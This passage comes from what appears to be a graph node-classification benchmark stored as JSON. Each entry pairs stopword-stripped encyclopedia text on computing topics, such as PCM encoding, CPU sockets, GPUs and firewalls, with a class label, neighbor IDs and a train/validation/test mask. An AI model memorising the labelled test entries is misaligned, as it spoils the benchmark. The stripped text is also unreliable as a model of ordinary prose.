bits giving 64 kbit/s digital signal known ds0 default signal compression encoding ds0 either μ-law mu-law pcm north america japan a-law pcm europe rest world logarithmic compression systems 12- 13-bit linear pcm sample number mapped 8-bit value system described international standard g.711 circuit costs high loss voice quality acceptable sometimes makes sense compress voice signal even adpcm algorithm used map series 8-bit µ-law a-law pcm samples series 4-bit adpcm samples way capacity line doubled technique detailed g.726 standard later found even compression possible additional standards published international standards describe systems ideas covered privately owned patents thus use standards requires payments patent holders adpcm techniques used voice ip communications pcm either return-to-zero rz non-return-to-zero nrz nrz system synchronized using in-band information must long sequences identical symbols ones zeroes binary pcm systems density 1-symbols called ones-density ones-density often controlled using precoding techniques run length limited encoding pcm code expanded slightly longer code guaranteed bound ones-density modulation channel cases extra framing bits added stream guarantee least occasional symbol transitions another technique used control ones-density use scrambler polynomial raw data tend turn raw data stream stream looks pseudo-random raw stream recovered exactly reversing effect polynomial case long runs zeroes ones still possible output considered unlikely enough within normal engineering tolerance cases long term dc value modulated signal important building dc offset tend bias detector circuits operating range case special measures taken keep count cumulative dc offset modify codes necessary make dc offset always tend back zero many codes bipolar codes pulses positive negative absent typical alternate mark inversion code non-zero pulses alternate positive negative rules may violated generate special symbols used framing special purposes word pulse term pulse-code modulation refers pulses found transmission line perhaps natural consequence technique evolved alongside two analog methods pulse width modulation pulse position modulation information encoded represented discrete signal pulses varying width position respectively respect pcm bears little resemblance forms signal encoding except used time division multiplexing numbers pcm codes represented electrical pulses device performs coding decoding function telephone circuit called codec",
    "neighbors": [
      8192,
      646,
      2057,
      10381,
      1550,
      7698,
      2968,
      2458,
      5020,
      10270,
      5664,
      11686,
      3496,
      8232,
      5291,
      7723,
      2221,
      2989,
      9006,
      1969,
      2994,
      3123,
      5304,
      1849,
      3130,
      1083,
      2368,
      7490,
      3140,
      7108,
      2891,
      3788,
      3921,
      10833,
      3156,
      3416,
      7900,
      3040,
      1121,
      3168,
      4963,
      8160,
      9057,
      2920,
      5736,
      7400,
      8945,
      2802,
      119,
      7550
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7109,
    "label": 3,
    "text": "ETen_Chinese_System:eten chinese system eten chinese system 倚天中文系統 popular dos-compatible traditional chinese operating system chinese windows 95 dos support chinese characters extended ascii many companies taiwan developed ibm pc compatible traditional chinese operating system running dos mutually incompatible os kuo chia 國喬 acer developer eten os e-ten earned early profits sales hardware based plug-in card based chinese system products software chinese systems widely copied many traditional chinese users software pirates difficult e-ten control traditional chinese products compatible eten os time microsoft developed chinese windows 3.1 windows 95 traditional chinese software developer users shifted windows dos last version eten os chinese windows-compatible version eten traditional chinese os used dos based pos systems",
    "neighbors": [
      6129
    ],
    "mask": "Test"
  },
  {
    "node_id": 7110,
    "label": 3,
    "text": "Socket_423:socket 423 socket 423 423 pin cpu socket used first generation pentium 4 processors based willamette core replaced socket 478 2001 socket houses processor designed socket 423 package socket short-lived became apparent electrical design proved inadequate raising clock speed beyond 2.0 ghz intel produced chips using socket less year november 2000 august 2001 replaced socket 478 processors used socket also locked multiplier means overclockable unless front side bus frequency increased however raising fsb frequency could push buses spec thus cause system instability powerleap pl-p4/n device developed form socket adapter allowing use socket 478 processors socket 423",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      1776,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Train"
  },
  {
    "node_id": 7111,
    "label": 3,
    "text": "Turing_(microarchitecture):turing microarchitecture turing codename graphics processing unit gpu microarchitecture developed nvidia successor volta architecture named prominent mathematician computer scientist alan turing architecture first introduced august 2018 siggraph 2018 along professional workstation quadro rtx products based one week later gamescom along consumer geforce rtx 20 series products based architecture introduces first consumer products capable real-time ray tracing longstanding goal computer graphics industry key elements include dedicated artificial intelligence processors tensor cores dedicated ray tracing processors turing leverages microsoft dxr optix vulkan access ray-tracing february 2019 nvidia released geforce 16 series gpus utilizes new turing design lacks ray tracing artificial intelligence cores turing manufactured using tsmc 12 nm finfet semiconductor fabrication process high-end tu102 gpu includes 18.6billion transistors fabricated using process turing also uses gddr6 memory samsung electronics previously micron technology turing microarchitecture combines multiple types specialized processor core enables implementation limited real-time ray tracing accelerated use new rt ray-tracing cores designed process quadtrees spherical hierarchies speed collision tests individual triangles features turing gddr6 memory produced samsung electronics quadro rtx series rtx 20 series initially launched micron memory chips switching samsung chips november 2018 nvidia reported rasterization cuda performance gains existing titles approximately 30–50 previous generation ray-tracing performed rt cores used produce reflections refractions shadows replacing traditional raster techniques cube maps depth maps instead replacing rasterization entirely however information gathered ray-tracing used augment shading information much photo-realistic especially regards off-camera action nvidia said ray-tracing performance increased 8 times previous consumer architecture pascal generation final image accelerated tensor cores used fill blanks partially rendered image technique known de-noising tensor cores perform result deep learning supercomputers codify example increase resolution images tensor cores primary usage problem solved analyzed supercomputer taught example results desired supercomputer determines method use achieve results done consumer tensor cores methods delivered via driver updates consumers turing development platform called rtx rtx uses microsoft dxr optix vulkan access ray-tracing includes access ai-accelerated features ngx windows 10 october 2018 update includes public release directx raytracing",
    "neighbors": [
      3585,
      3203,
      9489,
      10658,
      7086,
      9774,
      10675,
      11322,
      5949,
      8514,
      7236,
      1480,
      2635,
      2525,
      2277,
      8937,
      11630,
      1776,
      6900,
      2937
    ],
    "mask": "None"
  },
  {
    "node_id": 7112,
    "label": 2,
    "text": "AQuoSA:aquosa aquosa adaptive quality service architecture open architecture provisioning adaptive quality service functionality linux kernel project features flexible portable lightweight open architecture supporting qos related services top general-purpose operating system linux architecture well founded formal scheduling analysis control theoretical results key feature aquosa resource reservation layer capable dynamically adapting cpu allocation qos aware applications based run-time requirements order provide functionality aquosa embeds kernel-level cpu scheduler implementing resource reservation mechanism cpu based earliest deadline first edf gives ability linux kernel realize partially temporal isolation among tasks running within system aquosa one projects provides real-time scheduling capabilities unprivileged users multi-user system controlled way means properly designed access-control model architecture project may summarized follows lowest level patch linux kernel adds ability notify dynamically loaded modules relevant scheduling event identified creation death tasks well block unblock events patch minimally invasive consists lines code properly inserted mainly within linux scheduler code sched.c called generic scheduler patch potentially allows implement scheduling policy resource reservations layer composed three components core component dynamically loadable kernel module implements resource reservations scheduling paradigm cpu exploiting functionality introduced linux kernel generic scheduler patch second user-level library qres library allows application use new scheduling policy complete well-designed set api calls essentially calls allow application ask system reserve certain percentage cpu process es third kernel-level component supervisor mediates requests made applications qres library total sum requested cpu shares violate schedulability condition scheduler less one slightly less one due overhead supervisor behaviour completely configurable system administrator possible specify per-user/per-group basis minimum guaranteed maximum allowed values reservations made cpu aquosa applications may use directly resource reservation layer allows reserve fraction cpu run required scheduling guarantees example multimedia application may ask operating system run application guarantee scheduled least q milliseconds every p milliseconds q p depend nature application registering application resource reservation layer possible specify minimum guaranteed reservation system always guarantee application based requests minimum guaranteed reservations layer performs admission control i.e allows new application addition new set running applications overcome cpu saturation limit typical multimedia application making use high compression technologies may quite difficult impractical inconvenient run applications fixed reservation cpu fact efficient reservation used may vary time due varying compression level results varying decompression time traditional real-time systems make use wcet worst case execution time analysis techniques order compute maximum time instance example periodic task may execute cpu blocking waiting next instance analysis difficult today complex multimedia applications especially running general-purpose hardware like standard pcs technologies like multi-level caches cpu execution pipelines on-bus buffers multi-master buses introduce many unpredictable variables determining time required memory accesses systems much convenient tune system design based average expected load application otherwise system may significantly under-utilized runtime already mentioned certain classes multimedia applications video player quite impossible find appropriate fixed value fraction cpu required application run-time due heavy fluctuations load depending actual data processed application fixed reservation based average requirements slightly greater results transient periods poor quality runtime e.g movie playback hand fixed reservation based maximum expected load results unneeded over-reservation cpu time except periods load really approaches maximum expected value classes applications much convenient use adaptive reservation techniques like ones provided adaptive reservation layer aquosa performs continuous on-line monitoring computational requirements application process es may dynamically adapt reservation made cpu depending monitored data adaptive reservation layer exposes applications api using set controllers quite general use within wide set multimedia applications real-time variations linux require users real-time capabilities modified os root privileges system perfectly acceptable embedded system context however excessive multi-user systems real-time scheduling features needed multimedia applications similar therefore aquosa embeds dedicated access-control model system administrators details found paper topic published rtas 2008",
    "neighbors": [
      1776,
      6419,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7113,
    "label": 3,
    "text": "Nano-ITX:nano-itx nano-itx computer motherboard form factor first proposed via technologies cebit march 2003 implemented late 2005 nano-itx boards measure fully integrated low power consumption motherboards many uses targeted smart digital entertainment devices pvrs set-top boxes media centers car pcs thin devices four nano-itx motherboard product lines far via epia n epia nl epia nx via epia nr boards available wide variety manufacturers supporting numerous different cpu platforms udoo released least 1 nano-itx board udoo bolt",
    "neighbors": [
      10337,
      2500,
      455,
      3883,
      7151,
      10095,
      2161,
      2803,
      8730,
      10715,
      666,
      9307,
      3037
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7114,
    "label": 1,
    "text": "Institute_for_Social_Inventions:institute social inventions institute social inventions think-tank set 1985 publicise launch good ideas improving quality life founder nicholas albery 1948-2001 sought promote non-technological innovations institute emerged informal network social centers info-services spread around london throughout 1970s one earliests centers bit information service founded 1968 john hoppy hopkins years coordinator bit nicholas albery came idea institute would promote kinds ideas experimentations developed mainly inside called alternative society institute known different names institute social innovations institute social change denominations revolved around concept new improvements made within situation mainstream society goes time considered merged global ideas bank formed 1995",
    "neighbors": [
      6202,
      4651
    ],
    "mask": "None"
  },
  {
    "node_id": 7115,
    "label": 7,
    "text": "Matrixx_Software:matrixx software matrixx software digital commerce platform company matrixx software founded jennifer kyriakakis dave labuda 2009 labuda serves company cto ceo kyriakakis serves company vp marketing company based saratoga california matrixx produces digital commerce platform used large telecom companies management operations support systems business support systems runs premises private cloud/nfv environments public cloud one focus company aid billing daily transactions processed mobile devices attempting improve cost/revenue margin billing client companies matrixx also polls mobile users regarding views mobile telecom companies 2016 matrixx received 5 million financing pldt capital acquiring 4 company 2018 company raised 40 million series c round funding led sutter hill ventures investors including ck hutchison holdings bringing company total financing 100 million investors company included venture capital arms telstra swisscom",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7116,
    "label": 3,
    "text": "Tombs_&_Treasure:tombs amp treasure tombs treasure known japan adventure game originally developed nihon falcom 1986 pc-8801 pc-9801 fm-7 msx 2 x1 japanese computer systems famicom/nes version released 1988 altered story-based featured new music role-playing elements english-language nes version published infocom 1991 japanese enhanced remakes released saturn windows systems 1998 1999 respectively game takes place ancient mayan city chichen itza yucatán peninsula alternates using three-quarters overhead view travelling ruin ruin switching first-person perspective upon entering specific location start game player allowed name protagonist young brown-haired man lead female green-haired lass daughter one professor imes names manually entered game randomly choose pre-coded list names characters professor imes renowned archaeologist investigating artifact known sun key potentially ability unlock greatest secrets lost mayan civilization rumored housed somewhere within chichen itza however latest expedition team mysteriously disappeared exploring different temples dates june 22 july 14 guide josé able escape unharmed return artifacts team found hoping help player quest find professor three talking professor secretary anne travel mexico ancient city look clues several actual sites chichen itza explored player although interiors purposes purposefully changed slightly order help create atmosphere fantasy mystery-solving intrigue furthermore ruin home demon said control creature known tentacula although speculation gathered professor notes josé say player start tombs treasure predominantly solving puzzles interacting objects one another found throughout mayan city travelling temple temple available action walk using d-pad however temple entered player may start exploring much thoroughly using list picture-based action keys go push wash etc characters interact environment inspecting clues manipulating unlock another area elsewhere several items collect well whose purpose learned looking game gives three characters—the boy girl josé—their special attributes let contribute quest boy player in-game avatar usually hands-on work girl talented musically josé strong able move things two however light turn-based combat also faces player demon encountered inside ruin encounters almost always happen first room ruin although exceptions fighting accomplished simply enough using fight command although means player using bare hands equipping sword done fight selecting use highlighting sword inventory first battles strictly turn-based means healing simply bashing away monster one dead however possible run away fight go command player fully healed comes back try battle later game uses simplistic experience point system gives player additional levels hit points winning battles successfully solving puzzles throughout chichen itza player kept advancing far early simply wo n't strong enough yet contend higher-level monsters sure encounter although occasionally player may defeated despite strong enough game also came packaged small guide represented professor journal written awkward cursive form hard understand well speaking riddles often aid player read correctly ruins strictly show entered vast majority",
    "neighbors": [
      577,
      6797,
      9006,
      1265,
      625,
      627,
      11666
    ],
    "mask": "None"
  },
  {
    "node_id": 7117,
    "label": 4,
    "text": "PrivateCore:privatecore privatecore venture-backed startup located palo alto california develops software secure server data server attestation memory encryption company attestation memory encryption technology fills gap exists “ data motion ” encryption tls email encryption “ data rest ” encryption disk encryption tape encryption protecting “ data use ” random access memory privatecore memory encryption technology protects threats servers cold boot attacks hardware advanced persistent threats rootkits/bootkits computer hardware supply chain attacks physical threats servers insiders privatecore acquired facebook deal announced 7 august 2014 privatecore founded 2011 security veterans vmware google seed funding foundation capital privatecore “ virtualizes ” physical security enables service providers enterprises deploy servers processing sensitive data outsourced environments maintaining security around data use company memory encryption technology spurred number industry trends including increasing sophistication hackers larger number servers outsourced environments larger amounts sensitive data placed persistent memory x86 virtualization technology increase environment attack surface privatecore acquired facebook deal announced 7 august 2014 privatecore focus securing data-in-use x86 servers company taken advantage recent microprocessor innovations including larger microprocessor caches hardware cryptographic acceleration technology enable effective methods encrypting memory maintaining acceptable application performance technology approach goes beyond previous academic research efforts tresor privatecore assumes element need trusted system central processing unit cpu firm uses trusted platform module tpm chips intel trusted execution technology intel txt provide remote server attestation privatecore also supports cryptographic hardware acceleration provided intel aes-ni technology privatecore technology positioned applicable outsourced hosted environments enterprise trust compute infrastructure privatecore vcage product portfolio comprises vcage manager vcage host vcage manager validates integrity x86 servers running linux well vcage host vcage host installs bare-metal servers provides hardened hypervisor based kvm secure server random access memory ram aes encryption vcage host loading secure hypervisor cpu cache acting gateway encrypt memory paging cpu cache ram vcage memory encryption leverages kvm hypervisor also potential support hypervisors vcage host supports existing kvm management tools vcage supports number use cases including creating openstack trusted computing pools well protecting x86 servers co-location bare-metal cloud environments vcage manager vcage host became generally available 11 february 2014",
    "neighbors": [
      9541,
      11046,
      6153,
      8204,
      3629,
      10348,
      7794,
      499,
      4695,
      7354,
      8439,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 7118,
    "label": 2,
    "text": "Notification_Center:notification center notification center feature ios macos provides overview alerts applications displays notifications user completes associated action rather requiring instant resolution users may choose applications appear notification center handled initially released ios 5 october 2011 notification center made available macs part os x mountain lion july 2012 notification center released ios 5 replace previous system dealing push local notifications instead interrupting user alert notification center instead displays banner top screen allows user continue using device disappears set period time previous notifications collated notification center panel displayed ios dragging status bar os x clicking notification center button using track-pad gestures swiping right left notifications may selected user redirects user application notification initially created marking alert read notification read removed panel users may also remove notifications without reading deleting individual alerts dismissing application alerts within application generating ios device locked new notifications appear lock screen users may access application generating alert swiping application icon finger left right along notification notification center iphone ipod touch also includes weather stocks widgets displaying information weather user current location stocks user selected stocks application feature available ipad os x release ios 7 added weather widget ipad notification center users also select option display twitter facebook buttons allowing send tweets update status directly notification center ios 7 however option send tweets update facebook statuses removed application uses push notifications system provided apple local notifications may use notification center users may customise want appear notification center may opt stop certain applications appearing center sending alerts screen os x users may also disable alerts banners day stopping notifications appearing screen however notifications sent time still visible notification center panel similar service included ios 6 part disturb feature",
    "neighbors": [
      10755,
      9732,
      4615,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      7292,
      2686,
      6783,
      9343,
      10878,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      2735,
      3248,
      7857,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      9451,
      1772,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      7496,
      9035,
      1878,
      4957,
      6495,
      9063,
      4457,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      1960,
      8109,
      430,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      10221,
      7154,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 7119,
    "label": 4,
    "text": "Zendian_problem:zendian problem zendian problem exercise communication intelligence operations mainly traffic analysis cryptanalysis devised lambros d. callimahos part advanced course ca-400 callimahos taught national security agency cryptanalysts starting 1950s scenario involves 375 radio messages said intercepted december 23 us army contingent united nations force landed fictional island zendia pacific ocean typical intercept looks like message first line provided intercept operator giving call signs frequency time reference number rest message transcript morse code transmission beginning intercepted message header consists 8 four-digit groups initially meaning numeric header known meanings various components header serial number assigned transmitting organization message center worked traffic analysis rest message consists indicators ciphertext first group evidently discriminant indicating cryptosystem used depending cryptosystem second group may contain message-specific keying element initial rotor settings first two groups repeated end message allows correction garbled indicators remaining characters encrypted text since transmissions always use complete groups nulls may used pad text cryptosystems employed include transposition dinome rotor-based ciphers one-part code successfully tackled without use computer solution easy practical exercise reinforces many basic principles including ways exploit collection message traffic certain amount cleartext inter-operator chatter also provided may help analysis headers discriminants also given intercepts next three days may used traffic analysis determining daily operating procedures zendian problem declassified available either part military cryptanalytics book published reprints aegean park press walnut creek ca usa small differences ciphertext sources neither entirely error-free indeed errors intentional dealing part learning process karl heinz-everts web site provides link downloadable archive intercepts site also provides analysis partial solutions viewed anyone wishing learn working exercise cryptanalists successfully finished ca-400 became members dundee society society founded lambros d. callimahos named empty dundee marmalade jar desk could n't disclose society real purpose large print showing fictional nation zendia hangs wall library national cryptologic museum operated nsa copies map shrunken degree feature labels illegible appear previously cited books",
    "neighbors": [
      6017,
      6928,
      1941,
      8726,
      1189,
      3495,
      9900,
      3629,
      1838,
      9517,
      5308,
      6343,
      6344,
      6599,
      11335,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      8674,
      2148,
      7652,
      3305,
      7145,
      2419,
      6005,
      6136
    ],
    "mask": "None"
  },
  {
    "node_id": 7120,
    "label": 5,
    "text": "CAMEL_Application_Part:camel application part camel application part cap signalling protocol used intelligent network architecture cap remote operations service element rose user protocol layered top transaction capabilities application part tcap ss 7 protocol suite cap based subset etsi core allows implementation carrier-grade value added services unified messaging prepaid fraud control freephone gsm voice gprs data networks camel means adding intelligent applications mobile rather fixed networks builds upon established practices fixed line telephony business generally classed heading intelligent network application part inap cs-2 protocol camel application part cap portable software provides mechanisms support operator services beyond standard gsm services subscribers roaming within outside home plmn hplmn cap product extends framework gsm/3g networks implementing in-based services within gsm/3g networks camel used subscriber roaming networks allowing home network monitor control calls made subscriber camel provides services prepaid roaming services fraud control special numbers e.g. 123 voicemail works everywhere closed user groups e.g. office extension numbers work everywhere camel cap defined four phases accompanying specification builds upon previous phase cap phase provides message set procedures needed support corresponding camel phase requirements defined 3gpp ts 22.078 service aspects 3gpp ts 23.078 technical realization definition protocol may considered split three sections",
    "neighbors": [
      706,
      7811,
      5704,
      10864,
      7865,
      1437
    ],
    "mask": "Test"
  },
  {
    "node_id": 7121,
    "label": 4,
    "text": "Firestarter_(firewall):firestarter firewall firestarter personal firewall tool uses netfilter iptables/ipchains system built linux kernel ability control inbound outbound connections firestarter provides graphical interface configuring firewall rules settings provides real-time monitoring network traffic system firestarter also provides facilities port forwarding internet connection sharing dhcp service firestarter free open-source software uses gui widgets gtk+",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      1164,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      2996,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7122,
    "label": 3,
    "text": "Socket_FS1:socket fs1 socket fs1 notebooks using amd apu processors codenamed llano trinity richland socket fs1r2 llano -branded products combine k10 cedar vliw5 uvd 3 video acceleration amd eyefinity-based multi-monitor support three displayport-monitors trinity richland -branded products piledriver northern islands vliw4 uvd 3 vce 1 video acceleration amd eyefinity-based multi-monitor support four displayport-monitors amd desktop cpus available 722-pin package socket am1 fs1b clear whether desktop cpus compatible socket fs1 vice versa",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      4246,
      2719,
      2463,
      4767,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "None"
  },
  {
    "node_id": 7123,
    "label": 6,
    "text": "Temp_File_Cleaner:temp file cleaner temp file cleaner tfc utility program microsoft windows designed quickly remove temporary unnecessary files might otherwise prove difficult find dynamic paths multiple locations tfc minimilist design single purpose allow compact installation version 3.1.1 full installation occupies 3.7mb supports removal unnecessary temporary files created google chrome mozilla firefox internet explorer opera browsers well created course normal system operation windows updates cache windows logs windows root user temp files created variety programs addition tfc includes ability customize operations include deeper search subdirectories brute force deletion root path specification addition advanced cleaning protocols windows debug files hibernation files system restore data tfc allows test run operation offering users ability preview files would deleted upon normal execution well amount space would freed",
    "neighbors": [
      8584,
      6797,
      7983,
      3571,
      52
    ],
    "mask": "Test"
  },
  {
    "node_id": 7124,
    "label": 4,
    "text": "Anomaly-based_intrusion_detection_system:anomaly-based intrusion detection system anomaly-based intrusion detection system intrusion detection system detecting network computer intrusions misuse monitoring system activity classifying either normal anomalous classification based heuristics rules rather patterns signatures attempts detect type misuse falls normal system operation opposed signature-based systems detect attacks signature previously created order positively identify attack traffic system must taught recognize normal system activity two phases majority anomaly detection systems consist training phase profile normal behaviors built testing phase current traffic compared profile created training phase anomalies detected several ways often artificial intelligence type techniques systems using artificial neural networks used great effect another method define normal usage system comprises using strict mathematical model flag deviation attack known strict anomaly detection techniques used detect anomalies include data mining methods grammar based methods artificial immune system network-based anomalous intrusion detection systems often provide second line defense detect anomalous traffic physical network layers passed firewall security appliance border network host-based anomalous intrusion detection systems one last layers defense reside computer end points allow fine-tuned granular protection end points application level anomaly-based intrusion detection network host levels shortcomings namely high false-positive rate ability fooled correctly delivered attack attempts made address issues techniques used payl mcpad",
    "neighbors": [
      9576,
      5577,
      939,
      9948,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 7125,
    "label": 2,
    "text": "Indus_OS:indus os indus os formerly known firstouch indian mobile operating system based android currently available english 23 indian regional languages spoken 95 indian population active user base 10 million company app marketplace app bazaar 400,000 apps indus os partnered phone brands gionee itel micromax_informatics intex technologies karbonn mobiles celkon swipe elite trio mobiles indus os founded 2015 rakesh deshmukh akash dongre sudheer b three alumni indian institute technology bombay hari padmanabhan iit kanpur alumni industry veteran serial entrepreneur seed investor company indus os raised total 13 million series funding led omidyar network jsw ventures ventureast company also funded among others angel investors mayank singhal temasek holdings pranay chulet founder quikr amit gupta naveen tewari co-founders inmobi kunal bahl rohit bansal co-founders snapdeal may 2015 micromax_informatics started shipping latest version unite 3 unite series smartphones firstouch os operating system available english 10 indian languages key feature operating system swipe-to-translate indus swipe helped users translate transliterate english text regional languages operating system also app marketplace app bazaar 5000 applications regional languages popular application marketplace microsoft skype available popular indian regional languages including hindi december 2015 firstouch announced collaboration government india ministry electronics information technology previously known department electronics deity introduce text-to-speech technology regional languages operating system regional app marketplace app bazaar integrated carrier billing facility hence allows users download apps regional languages without requiring email id paying credit cards 90 indus os users activated app bazaar smartphones 75 use monthly basis app bazaar 50000 applications regional languages operating system features english 23 regional languages assamese bengali gujarati hindi kannada malayalam marathi odia punjabi tamil telugu urdu company patented keyboard allows word prediction matra prediction auto correction swipe-to-translate transliterate features users indus os offices mumbai delhi dhaka currently 70-member team company also plans open office china effort partner international smartphone brands operating system received positive review firstpost tech2 rehan hooda review intex aqua supre+ claimed indus os shining factor otherwise ordinary smartphone abhishek baxi android authority review operating system said unlike stock android custom android skins support indian languages indus os menu items icon texts et al appear chosen regional language big win app bazaar support carrier billing allowing users download paid apps games via mobile balance pre-paid get billed post-paid ’ mighty convenient consumers great motivator app developers publishers indus os economic times telecom award 2016 innovation developing oem product category may 7 2016 indus os declared second popular os india according research study conducted counterpoint research may 2016 os second popular india 7.6 market share greater market share microsoft apple android remains popular 82.3 indus os awarded prestigious tie50 silicon valley top start-up award year 2016 et telecom award 2016 'innovation development oem product indus os 'digital startup year award drivers digital awards 2016 nasscom announced indus os one top 10 startups india nasscom product conclave 2016 company also awarded aegis graham bell award digital india category alongside vodafone india year 2016 gsma nominated indus os annual global mobile awards mobile world congress barcelona 2017 category best mobile innovation emerging markets indus os brand year award technology category world consulting research corporation mumbai december 21 2016 mint newspaper mit technology review named akash dongre co-founder chief product officer indus os one top innovators age 35 india emtech 2017 event indus os also named superbrand super startups awarded 30+ innovative business models india october 2017 indus os awarded confederation indian industry industrial innovation award one top 10 startup india company story also documented case study ivey publishing also distributed harvard business review",
    "neighbors": [
      2259
    ],
    "mask": "None"
  },
  {
    "node_id": 7126,
    "label": 6,
    "text": "Dell_Fluid_File_System:dell fluid file system dell fluid file system fluidfs shared-disk filesystem made dell provides distributed file systems clients customers buy appliance combination purpose-built network-attached storage nas controllers integrated primary backup power supplies i.e. appliance attached block level storage via iscsi fiber channel protocol single dell fluidfs appliance consists two controllers operating concert i.e. active/active connecting back-end storage area network san depending storage capacity requirements user preference fluidfs version 4 nas appliances used compellent equallogic san arrays equallogic fs7600 fs7610 connect client network dell equallogic arrays either 1 gbit/s fs7600 10 gbit/s fs7610 iscsi protocol compellent fluidfs available either 1 gbit/s 10 gbit/s iscsi connectivity client network connection backend compellent san either 8 gbit/s fibre channel 10 gbit/s iscsi fluidfs software layer running nas appliance creates single name-space users offering access via server message block smb network file system nfs also includes features prevent data-loss corruption uses caching increase performance fluidfs result dell acquisition intellectual property exanet firm whose assets included hardware-independent scalable nas storage product previously known dell scalable file system dsfs dell changed name fluidfs acquisition compellent successfully used fluid data tag-line startup company dell developed exanet file system support ndmp backup integrated ip obtained acquisition ocarina networks included deduplication data compression technology dell initially adapted fluidfs work compellent equallogic powervault storage platforms underlying software architecture fluidfs employs linux-based symmetric clustering model distributed metadata native load balancing flexible caching capabilities features scalability limited volume size traditional file systems supports scaling adding capacity system scaling adding nodes performance system fluidfs operates across symmetric cluster purpose-built nas controllers housed pairs within 2u appliance interface fabric shared back-end storage via iscsi fibre channel storage area networks fluidfs architecture layered presents traditional file system network clients performing special functions back end designed utilize available resources network server disk levels improve response times based back-end storage product maximum number nas appliances storage capacity varies number nas appliances varies 1 4 entire capacity system managed single global namespace fluidfs v6 supports multitenancy total storage capacity tens pb maximum size single file 128 tb number files name-space limited 64 billion per appliance 256 billion 4 appliances making one largest industry",
    "neighbors": [
      5120,
      2564,
      6153,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      54,
      7225,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      7802,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      7863,
      5816,
      1212,
      8380,
      3265,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      8022,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      1400,
      890,
      10615,
      11128,
      7554,
      11146,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555
    ],
    "mask": "Test"
  },
  {
    "node_id": 7127,
    "label": 4,
